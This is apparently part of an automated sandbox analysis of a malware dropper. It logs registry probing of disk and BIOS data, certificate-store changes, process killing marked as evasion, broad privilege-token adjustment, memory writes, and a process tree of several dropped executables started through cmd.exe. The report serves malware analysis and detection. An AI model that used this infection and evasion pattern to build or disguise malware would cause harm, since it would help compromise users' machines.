Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1148 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe
PID 1148 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe
PID 1148 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe
PID 2532 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4968 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe
PID 4968 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe
PID 4968 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe
PID 2324 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
PID 2324 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
PID 2324 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
PID 4628 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe
PID 4628 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe
PID 1056 wrote to memory of 4564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe
PID 1056 wrote to memory of 4564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe
PID 2104 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe
PID 2104 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe
PID 2104 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe
PID 640 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe
PID 640 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe
PID 4948 wrote to memory of 3596 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe
PID 4948 wrote to memory of 3596 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe
PID 4948 wrote to memory of 3596 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe
PID 1964 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe
PID 1964 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe
PID 1964 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe
PID 3696 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe
PID 3696 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe
PID 3696 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe
PID 4560 wrote to memory of 1308 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe
PID 4560 wrote to memory of 1308 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe
PID 3220 wrote to memory of 4188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3220 wrote to memory of 4188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3220 wrote to memory of 4188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 4480 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 4480 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 9aa6e16872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 1710990cbc64.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c862a054a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe

08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe

1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe

08240101651be7e1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe

c862a054a35.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe

453c5fa76a849.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe

53516815d3135fe3.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe

9aa6e16872.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe

f34b9ab9db6d16.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe

e4b2f18fb52218.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2532 -ip 2532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 564

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe

4f5baa1083db067.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

